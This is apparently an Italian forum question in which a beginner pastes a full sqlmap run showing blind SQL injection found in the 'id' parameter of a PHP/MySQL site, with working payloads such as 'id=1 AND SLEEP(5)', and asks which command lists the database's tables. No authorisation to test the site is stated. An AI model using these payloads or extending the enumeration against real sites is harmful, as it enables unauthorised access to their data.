Ho appena iniziato a utilizzare sqlmap per verificare possibili attacchi di SQL injection.
Ho un sito web vulnerabile:
C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1
[*] starting at: 19:33:27
[19:33:27] [INFO] using 'xxx\session' as session file
[19:33:27] [INFO] testing connection to the target url
[19:33:31] [INFO] testing if the url is stable, wait a few seconds
[19:33:33] [INFO] url is stable
[19:33:33] [INFO] testing if GET parameter 'id' is dynamic
[19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
[19:33:34] [INFO] GET parameter 'id' is dynamic
[19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[19:33:35] [INFO] testing sql injection on GET parameter 'id'
[19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
y
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3404=3404
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[19:34:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.15
back-end DBMS: MySQL 5.0.11
[19:34:55] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 21 times
[19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'
[*] shutting down at: 19:34:55
Ora vorrei sapere se è possibile vedere se per esempio posso vedere tutte le tabelle nel database.
Che cosa devo digitare nella riga di comando per verificare questo?